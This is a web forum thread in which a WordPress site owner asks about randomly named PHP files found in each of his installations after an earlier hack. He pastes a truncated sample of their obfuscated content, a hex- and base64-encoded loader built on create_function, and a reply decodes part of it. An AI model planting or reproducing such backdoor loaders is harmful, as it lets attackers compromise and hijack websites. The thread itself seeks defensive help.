Quite disheartening... was this a failed hacking attempt?

by Big Al
2 replies
Hiya,

Around November time I had 11 or so sites hacked and everything you clicked on them in Google you were redirected elsewhere. I took all the sites down and started from scratch.

I've just logged into my hosting through Filezilla and noticed a number of bizarre file names:

maynord_spenser.php
evonne_arabella.php
certain_boycey.php

There is one of these weird filenames in each of my wordpress installations and they are outside the content, admin and includes folders. I've just scanned my site for malware and it came back ok so I'm not sure what they are?

I opened them up and the content looks something like this:

<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x 63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36 \x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7 b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ 7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7M jUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjI xOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2O zIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzI wMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzM DsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2Nzs xNjg7MjM1 .............. but a lot longer...........);?>

I even have a HTML site with one of these PHP files in it so I'm 99.9% sure it's an attempt at hacking.

Since getting hacked last time I changed my passwords, then have used WP Secure and Security Scan. My tables prefixes are different and I've also uploaded htaccess files to the wp-admin folders.

Plus I make sure to update all my sites are up to date with the latest version of Wordpress.

The sites seem to be performing ok and the malaware scan came back negative so I'm thinking someone may have unsuccessfully tried to hack my sites (again). I want to delete these files.

Has anyone any idea how someone might be accessing my sites? Is it through my hosting account or my FTP software? I even improved the security on my machine to scan for malware...

I'd like to tighten this up further because I don't want these rogue PHP files on my sites at all.

Thanks,

Alan
#attempt #disheartening #failed #hacking
  • Profile picture of the author minion
    Definitely looks like it - looks like its encoded the contents using a combination of hex + base64..

    For example, the first part translates to $_8b7b="create_function"; $_8b7b1f="base64_decode";
    It's common for these kind of attacks to be encoded like this.

    Just a quick question: Which host are you with?
    {{ DiscussionBoard.errors[5440984].message }}
  • Profile picture of the author Big Al
    Thanks, I've got in touch with my hosting company and left them to it... fingers crossed. I'm with Dreamhost who I quite like and would like to stay with. I'm going to hound them on this one because I've been taking precautions with passwords and net security like never before since that last hacking brought down 11 sites.

    Like I said the sites 'seem' to be performing ok, my links are still in tact and no funny redirection going on.

    Big Mike... do you have any recommendations for trojan or malware? I've started using Microsoft Security Essentials after good reviews and getting very annoyed with paid software that hampered my laptops performance.

    Thanks.
    {{ DiscussionBoard.errors[5441138].message }}

Trending Topics